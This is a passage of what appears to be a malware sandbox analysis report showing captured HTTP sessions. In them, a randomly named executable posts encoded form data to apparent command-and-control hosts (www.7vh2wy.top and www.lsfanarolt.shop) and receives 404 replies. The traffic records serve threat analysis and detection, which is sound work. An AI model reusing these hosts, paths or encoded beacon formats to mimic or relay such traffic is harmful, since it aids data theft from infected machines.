                                                                                  27192.168.2.55000920.2.249.7803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:55.291901112 CET1731OUTPOST /ocnr/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.7vh2wy.top
                                                                                  Origin: http://www.7vh2wy.top
                                                                                  Referer: http://www.7vh2wy.top/ocnr/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 33 48 61 6a 34 61 68 34 6a 50 4f 43 6b 59 49 58 34 78 7a 68 34 42 6a 44 48 71 74 55 32 6d 54 77 32 59 55 52 68 31 31 66 4c 73 65 53 33 32 52 6c 68 64 51 62 74 67 47 36 56 50 31 53 34 64 2b 44 68 5a 56 36 46 43 77 2b 2b 68 74 67 6a 74 35 70 78 6f 4d 78 2f 51 65 6e 46 41 59 64 63 6c 4c 33 55 79 41 64 6a 31 52 50 67 50 57 34 6f 4b 4c 32 39 66 32 5a 46 52 4a 6e 57 47 62 71 6b 74 68 52 78 73 79 71 46 69 5a 75 6b 32 52 52 6c 7a 76 6f 64 55 4e 65 49 57 62 4b 37 4c 7a 67 68 75 73 48 74 35 79 4b 30 44 57 37 2f 57 34 65 64 6c 30 55 5a 64 46 68 42 75 32 4b 46 71 30 6e 4d 4e 6a 61 2f 71 46 73 55 41 48 34 33 76 4e 75 33 67 4d 4b 50 76 76 4b 65 6f 50 74 79 63 79 4d 38 7a 71 48 4b 67 30 56 6c 78 31 66 4b 61 4b 62 69 66 67 57 70 66 72 68 6c 4b 4c 57 44 62 59 54 62 44 72 6b 43 59 77 34 51 48 4a 77 4e 4d 6f 47 54 58 39 42 5a 58 73 38 74 73 47 51 70 78 64 44 6b 74 49 32 4c 4d 51 76 34 33 58 48 6d 4d 41 6a 72 5a 35 78 76 65 49 52 67 4c 56 44 70 41 55 54 50 32 78 32 55 47 36 63 4b 41 61 53 41 4e 4b 72 67 76 43 [TRUNCATED]
                                                                                  Data Ascii: 2J=3Haj4ah4jPOCkYIX4xzh4BjDHqtU2mTw2YURh11fLseS32RlhdQbtgG6VP1S4d+DhZV6FCw++htgjt5pxoMx/QenFAYdclL3UyAdj1RPgPW4oKL29f2ZFRJnWGbqkthRxsyqFiZuk2RRlzvodUNeIWbK7LzghusHt5yK0DW7/W4edl0UZdFhBu2KFq0nMNja/qFsUAH43vNu3gMKPvvKeoPtycyM8zqHKg0Vlx1fKaKbifgWpfrhlKLWDbYTbDrkCYw4QHJwNMoGTX9BZXs8tsGQpxdDktI2LMQv43XHmMAjrZ5xveIRgLVDpAUTP2x2UG6cKAaSANKrgvC6RLWftwT74RPq+MXh03Kq/Jr2G5ssZ4GIqe2f46K7zZgvMzwJ6b+g4bXYu7fEJnrgMckGzk89FrX8J18tPTweCjxNWZWEbfkHt7tDiGm8hQcbCA7G7l2n7U8H3ii8iXbxBviAe5o76+LaWSUOw3tMl0sQZWtgh+V2twLydjJg7y92SAGhyN633k7IMsH3fGXzyiG7gElqhfKM4thBTx+bK1ocwbWsj3LiJekqAACZM9fVg5FWiF1FGmdc/qu4vg97xodNDHI/4mY7I5xAy21V4QKlzKgebBNXLSG9xKc9ovsXdapdt/X7LowwWgXScewkt0O8aZtQiJE4HZQJSbWEo9IJNQ7aIJHraQSmBrCg06rM9bj9z0uM5IXiHhAqAruvCppKjuKS+KlPFU2qMCUBgZzcEXcEtO/lUsRZbbRAXHAdzMk2RL692lyZXQ0OzTkgYP4KC6edrJ2hATLbQNT2+1LRANtBdAhr/gOB253hMHzwot8t8RHOEos5mtAsdTfW3GRowV7jC6iSd705dFP103JFmwTQINbeFsLE0pS0rYVXRbmkAsG98VA25jkGVPGQtl8wXISovQ3csaUC+/DcNK5FkOBoka/xhkXGB0ZTARsQGQGQDI+7fQLftd0hMyFdHHKrUmTsqfFG5SjXQauivoodyMPmAdBrv [TRUNCATED]
                                                                                  Nov 13, 2024 15:35:56.258064985 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:56 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.55001020.2.249.7803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:35:57.835639000 CET439OUTGET /ocnr/?2J=6FyD7uZOrviJgscx3zDo9l3wDpxd2lbJ6NQik1x0LfmClWpek8Fmgw2VUsZOzaCZ8a9BTDMjp2431cAe4Zlp/DG/ZAZ2b2TXHQALvARevfDq7KvJw4eUAghtZHK7htMeug==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.7vh2wy.top
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:35:58.869076014 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Nov 13, 2024 15:36:00.242563009 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                  Nov 13, 2024 15:36:00.246177912 CET289INHTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 13 Nov 2024 14:35:58 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 146
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.550011172.67.197.57803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:04.225693941 CET709OUTPOST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 51 57 76 58 47 69 62 33 47 52 36 36 4a 68 41 70 73 73 4b 4a 6a 39 2f 46 7a 35 33 77 64 55 39 30 35 6d 6f 67 6e 6d 49 45 33 6c 56 32 66 62 77 62 31 43 49 5a 2b 70 62 4f 59 38 51 78 6d 75 4a 43 45 30 35 4b 53 69 58 6a 31 77 70 52 6e 5a 69 6f 58 4d 4b 68 5a 41 72 61 6d 45 4d 4c 51 62 4c 48 6a 45 55 6b 4c 4e 56 48 35 55 69 47 45 54 53 33 5a 4d 2b 48 37 7a 73 50 50 72 59 33 2b 6e 65 36 4d 61 77 63 2b 69 55 41 33 75 63 50 5a 67 4d 54 56 41 53 2f 51 76 73 67 54 6d 47 5a 44 79 57 34 59 4e 6d 31 67 69 4e 44 38 35 6c 6f 52 33 4a 54 67 55 4c 46 67 54 76 75 58 61 45 52 41 49 59 2f 48 38 4d 77 66 4e 51 3d
                                                                                  Data Ascii: 2J=QWvXGib3GR66JhApssKJj9/Fz53wdU905mognmIE3lV2fbwb1CIZ+pbOY8QxmuJCE05KSiXj1wpRnZioXMKhZAramEMLQbLHjEUkLNVH5UiGETS3ZM+H7zsPPrY3+ne6Mawc+iUA3ucPZgMTVAS/QvsgTmGZDyW4YNm1giND85loR3JTgULFgTvuXaERAIY/H8MwfNQ=
                                                                                  Nov 13, 2024 15:36:05.113054991 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7YQePIRYgS0X4yDeWfmMu7ZE0Hrd3IjYFPqzUFkACSCb2AqjyF236yOZwMUtN0Y97YcHzQRtj%2BnXuySmFfWcY13twaEVXUIBpb7hwfvpGZwlbgqqBOz8JzrGlrzuqniJKB4ni%2Bgm"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7df18dec6b97-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1229&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=709&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 44 ea a6 2d 6c 4d d2 48 a3 dd c4 a4 01 13 14 01 8f 5e 72 8d cd 12 3b d8 d7 b4 61 e2 7f 47 4e b2 b6 13 bf 5e 70 5e e2 bb ef be ef ce be 73 fc 68 f1 6e be fc 72 7d 0e 82 ca 02 ae 3f be ba ba 9c 83 e7 33 f6 69 3c 67 6c b1 5c c0 e7 d7 cb 37 57 10 0c 86 f0 81 8c 4c 89 b1 f3 b7 1e 78 82 a8 0a 19 db 6c 36 83 cd 78 a0 4d ce 96 ef d9 d6 b1 04 2e ac ff f5 6d 1b 33 c8 28 f3 92 a3 b8 15 d9 96 85 b2 b3 df 10 04 d3 e9 b4 8b f3 1c 28 2c b8 ca 67 1e 2a 0f 76 7f 49 2c 90 67 c9 11 00 40 4c 92 0a 4c 26 c3 09 3c 29 33 6e 45 04 6f 35 c1 85 5e ab 2c 66 9d b3 03 96 48 1c 9c 9e 8f df d6 b2 9e 79 73 ad 08 15 f9 cb a6 42 0f d2 6e 37 f3 08 b7 c4 9c 7e 04 a9 e0 c6 22 cd 3e 2e 2f fc 53 8f 1d 12 29 5e e2 cc cb d0 a6 46 56 24 b5 3a 60 f8 a0 8d 69 9e 43 c5 73 04 a5 09 56 2e 99 5d b8 a5 a6 40 a0 a6 c2 5e 2b b5 d6 eb 7c 6e dd e8 ac 81 bb 95 56 e4 5b f9 1d c3 60 52 6d 23 48 75 a1 4d 78 7c d2 ae 08 5a f7 8a 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                  Data Ascii: 2c9To0~_qdD-lMH^r;aGN^p^shnr}?3i<gl\7WLxl6xM.m3((,g*vI,g@LL&<)3nEo5^,fHysBn7~">./S)^FV$:`iCsV.]@^+|nV[`Rm#HuMx|ZhBn$/"pT>/d~8Etx@9]DPrK}#p89xIE`\
                                                                                  Nov 13, 2024 15:36:05.114892006 CET341INData Raw: 50 08 37 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e 78 2f ef 8f 5b f9 f1 b4 da 1e e8 57 70 b7 91 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a2 90 af 49 47 bd c1 b4 da ad e5 1e 43 ba 0a 61 ec ea dc 2b 64 b2 fe 2f 1a 7b 46 1e 16 52 dd ee cf 6d 3c 79
                                                                                  Data Ascii: P7"(o+Jx/[WppZlOIGCa+d/{FRm<y1~yPK+bxJBuCs{Jbj7Vjry}x0J]L$v5l i4Lm'psJ H-|][RvZ_R7


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.550012172.67.197.57803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:06.775327921 CET729OUTPOST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 51 57 76 58 47 69 62 33 47 52 36 36 62 78 51 70 75 4c 65 4a 6c 64 2f 45 39 5a 33 77 55 30 39 77 35 6e 55 67 6e 6e 4d 79 72 42 35 32 65 36 41 62 7a 7a 49 5a 37 70 62 4f 41 4d 51 30 72 4f 4a 7a 45 31 46 6f 53 6e 76 6a 31 77 56 52 6e 63 47 6f 51 37 2b 67 5a 51 72 63 76 6b 4d 56 66 37 4c 48 6a 45 55 6b 4c 4c 35 70 35 56 4b 47 45 69 69 33 57 4e 2b 45 31 54 73 49 65 72 59 33 36 6e 65 32 4d 61 77 2b 2b 6d 55 71 33 73 55 50 5a 68 38 54 53 52 53 34 48 66 74 70 51 57 48 70 4d 43 72 43 58 4d 36 39 69 44 38 41 6e 4a 39 50 64 68 34 35 36 32 44 74 7a 7a 44 57 48 4a 4d 6d 52 34 35 57 64 66 63 41 42 61 46 30 34 78 52 67 77 2b 7a 4e 44 44 71 4b 68 2f 53 70 2f 43 77 70
                                                                                  Data Ascii: 2J=QWvXGib3GR66bxQpuLeJld/E9Z3wU09w5nUgnnMyrB52e6AbzzIZ7pbOAMQ0rOJzE1FoSnvj1wVRncGoQ7+gZQrcvkMVf7LHjEUkLL5p5VKGEii3WN+E1TsIerY36ne2Maw++mUq3sUPZh8TSRS4HftpQWHpMCrCXM69iD8AnJ9Pdh4562DtzzDWHJMmR45WdfcABaF04xRgw+zNDDqKh/Sp/Cwp
                                                                                  Nov 13, 2024 15:36:07.717477083 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:07 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h34ACzVB0bqwnNQpa%2FyDXh14QAQSBSfr43W4XnbD3VkbMW%2FTEB5TNiMHNS%2BaK5V8H4J%2BE150zUzbVh5VBKSPcXum6cFaiWqxOPA%2BpT%2BsUhf%2BE8BJSy9a0A8f8u7UoF8xpaXdjOHH"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e019eef2e57-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=729&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 44 ea a6 2d 6c 4d d2 48 a3 dd c4 a4 01 13 14 01 8f 5e 72 8d cd 12 3b d8 d7 b4 61 e2 7f 47 4e b2 b6 13 bf 5e 70 5e e2 bb ef be ef ce be 73 fc 68 f1 6e be fc 72 7d 0e 82 ca 02 ae 3f be ba ba 9c 83 e7 33 f6 69 3c 67 6c b1 5c c0 e7 d7 cb 37 57 10 0c 86 f0 81 8c 4c 89 b1 f3 b7 1e 78 82 a8 0a 19 db 6c 36 83 cd 78 a0 4d ce 96 ef d9 d6 b1 04 2e ac ff f5 6d 1b 33 c8 28 f3 92 a3 b8 15 d9 96 85 b2 b3 df 10 04 d3 e9 b4 8b f3 1c 28 2c b8 ca 67 1e 2a 0f 76 7f 49 2c 90 67 c9 11 00 40 4c 92 0a 4c 26 c3 09 3c 29 33 6e 45 04 6f 35 c1 85 5e ab 2c 66 9d b3 03 96 48 1c 9c 9e 8f df d6 b2 9e 79 73 ad 08 15 f9 cb a6 42 0f d2 6e 37 f3 08 b7 c4 9c 7e 04 a9 e0 c6 22 cd 3e 2e 2f fc 53 8f 1d 12 29 5e e2 cc cb d0 a6 46 56 24 b5 3a 60 f8 a0 8d 69 9e 43 c5 73 04 a5 09 56 2e 99 5d b8 a5 a6 40 a0 a6 c2 5e 2b b5 d6 eb 7c 6e dd e8 ac 81 bb 95 56 e4 5b f9 1d c3 60 52 6d 23 48 75 a1 4d 78 7c d2 ae 08 5a f7 8a 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                  Data Ascii: 2c9To0~_qdD-lMH^r;aGN^p^shnr}?3i<gl\7WLxl6xM.m3((,g*vI,g@LL&<)3nEo5^,fHysBn7~">./S)^FV$:`iCsV.]@^+|nV[`Rm#HuMx|ZhBn$/"pT>/d~8Etx@9]DPrK}#p89xI
                                                                                  Nov 13, 2024 15:36:07.717632055 CET351INData Raw: ec 45 60 d4 8a b4 86 0d ca 5c 50 08 37 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e 78 2f ef 8f 5b f9 f1 b4 da 1e e8 57 70 b7 91 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a2 90 af 49 47 bd c1 b4 da ad e5 1e 43 ba 0a 61 ec ea dc 2b 64 b2 fe 2f 1a 7b
                                                                                  Data Ascii: E`\P7"(o+Jx/[WppZlOIGCa+d/{FRm<y1~yPK+bxJBuCs{Jbj7Vjry}x0J]L$v5l i4Lm'psJ H-|][Rv


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.550013172.67.197.57803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:09.317289114 CET1746OUTPOST /b9df/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Origin: http://www.lsfanarolt.shop
                                                                                  Referer: http://www.lsfanarolt.shop/b9df/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 51 57 76 58 47 69 62 33 47 52 36 36 62 78 51 70 75 4c 65 4a 6c 64 2f 45 39 5a 33 77 55 30 39 77 35 6e 55 67 6e 6e 4d 79 72 42 78 32 65 49 34 62 77 51 77 5a 34 70 62 4f 65 38 51 31 72 4f 4a 55 45 30 74 73 53 6e 71 59 31 32 52 52 68 2f 2b 6f 56 50 69 67 41 67 72 63 77 30 4d 55 51 62 4c 6f 6a 45 46 76 4c 4e 5a 70 35 56 4b 47 45 67 36 33 66 38 2b 45 33 54 73 50 50 72 59 72 2b 6e 66 72 4d 5a 42 44 2b 6d 59 51 30 66 73 50 5a 42 73 54 54 6a 4b 34 46 2f 74 6e 56 57 48 78 4d 43 6e 6e 58 4d 6d 62 69 44 34 2b 6e 4c 74 50 65 31 56 59 6e 43 33 76 76 78 4c 55 4b 75 45 5a 42 34 70 76 66 38 38 32 47 61 68 31 2f 53 52 66 6d 35 6a 70 4a 54 71 46 38 4c 65 6c 35 31 64 66 75 54 42 68 55 66 52 4f 70 63 6e 67 4d 69 69 59 36 33 62 54 58 71 7a 30 4a 31 77 6e 43 57 38 73 6d 51 48 75 77 67 57 2f 5a 74 65 2f 35 43 4a 6a 4b 50 2f 4c 49 7a 59 4a 72 55 33 4e 6a 4d 70 32 44 34 4f 55 67 57 33 51 71 66 46 68 38 6d 52 71 7a 62 6b 6f 51 45 64 2b 6d 68 56 38 4e 59 49 31 75 48 77 37 39 35 6f 53 57 58 65 51 68 46 57 4a 68 2b 48 [TRUNCATED]
                                                                                  Data Ascii: 2J=QWvXGib3GR66bxQpuLeJld/E9Z3wU09w5nUgnnMyrBx2eI4bwQwZ4pbOe8Q1rOJUE0tsSnqY12RRh/+oVPigAgrcw0MUQbLojEFvLNZp5VKGEg63f8+E3TsPPrYr+nfrMZBD+mYQ0fsPZBsTTjK4F/tnVWHxMCnnXMmbiD4+nLtPe1VYnC3vvxLUKuEZB4pvf882Gah1/SRfm5jpJTqF8Lel51dfuTBhUfROpcngMiiY63bTXqz0J1wnCW8smQHuwgW/Zte/5CJjKP/LIzYJrU3NjMp2D4OUgW3QqfFh8mRqzbkoQEd+mhV8NYI1uHw795oSWXeQhFWJh+H1K3o+1ndzZW5+irVclwR447+FFeMHp5iwfjdcbVl4R08XqQ5RsOKeEQtFYl7ZXArDzapaCQipqqaLrkkV3/dvCm+Sf8FcK9OrUhTmGZoTh2FzorGpuSXCEgjmgu8T+mAzGspVv8HdYlRLFVE6RXU6CruvnaKKoypZIG0T7UPGGksPGCZkEwQf+EYcbiOP5WWjoFR03cURfjMI/6JcXvmDAwHuVrOgArtjO3sp9IXMT2Pq2l/d62mDOvdTFnXrg4+/jCt47yy2FahWMvF+LGAvabNFxNBG5n2zPG6mjV547xLDmZQaB2RLf7iKOQmPQvaDZ4A9vvDpdwNYmHA85IMLDg+54yT5kMP2MLx/JxHXRoQh5+m1Ub+evRGZmIfYJXaUpF0iKAr11wX5CbVPljkg7MDTYNVA6J3yd+0twfhVU1DvtwZ5asvHs54Zkq1vnb/h2DY1moOjb55zagedMR+s0IxZhVKHfTE5gxog82c1ek0HuJw3WHvb5tCZZdUp/EfQuVM5aoLk3C1oK7F0ERZ3cIcf0btmzpSmuK4UUiWLwM15DpheN8Qi3OmYblml5/XksskbsbxnHBZNWU0im6y46GmGDJFPtf4oyyo79pMHDNmvS82CR6wzzrUQVbTIFEHf2DllTtN/BeFxA7ooxJZcqJmT/eUrC9GI/ [TRUNCATED]
                                                                                  Nov 13, 2024 15:36:10.181864977 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s2euP4URg1J2vz3b62ZFwQbff6SE%2Fphv7Jp%2FgCbvP34epSrvesLZwSEUZRRe6zftrlmvTl9KRlbjAE%2Bpl3kGEVovEwyaYiyaDzq6R1ZymjdGO9L63NQa4A9rXRlhxMftVRkmxM7s"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e1178150c03-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1822&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1746&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
